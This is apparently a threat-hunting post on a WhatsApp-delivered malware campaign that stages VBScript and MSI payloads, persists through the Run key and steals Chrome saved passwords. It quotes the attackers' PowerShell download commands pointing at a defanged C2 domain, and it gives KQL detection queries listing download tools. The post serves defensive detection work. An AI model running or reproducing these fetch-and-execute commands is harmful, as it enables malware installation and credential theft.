WhatsApp malware campaign targeting Chrome credential vaults

#networksec #news

While hunting for malicious PowerShell techniques, we identified anomalous behavior indicative of staged payload execution.

Initial Access & Delivery Chain Summary

Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
Execution of the VBScript initiated a multi-stage payload delivery mechanism, where it:
Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
Created persistence by adding the installer script to the Run registry key.
Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.
Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords due to the established persistence.

Observed Malicious Execution Activity

WScript Executions

"wscript.exe" C:\Users*\AppData\Local\Temp\baixa_sscado.vbs
"WScript.exe" C:\Users*\AppData\Local\Temp**.zip.0e6*.vbs
"wscript.exe" C:\Users*\AppData\Local\Temp\installer.vbs

PowerShell Download Activity

"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

Msiexec Execution

"msiexec.exe" /i C:\Users*\AppData\Local\Temp\installer.msi /quiet /norestart

Detection query :

There will be false positives in the results, which must be eliminated through validation and filtering.

DeviceProcessEvents
| where InitiatingProcessFileName contains "wscript"
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget","iex","iwr")
| distinct ProcessCommandLine,InitiatingProcessCommandLine

.vbs & .msi Execution Identification :

union isfuzzy=true DeviceProcessEvents
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget","iex","iwr")
| project DeviceName,T1 = Timestamp , ProcessCommandLine , InitiatingProcessCommandLine
| join kind=inner ( DeviceProcessEvents
| where ProcessCommandLine contains "wscript" or ProcessCommandLine contains "msiexec"
| where ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs"
| project DeviceName,T2 = Timestamp , ProcessCommandLine1 = ProcessCommandLine , InitiatingProcessCommandLine1 = InitiatingProcessCommandLine
) on DeviceName
| extend timedifference = abs(datetime_diff('minute', T1, T2))
| where timedifference < 1

Reference :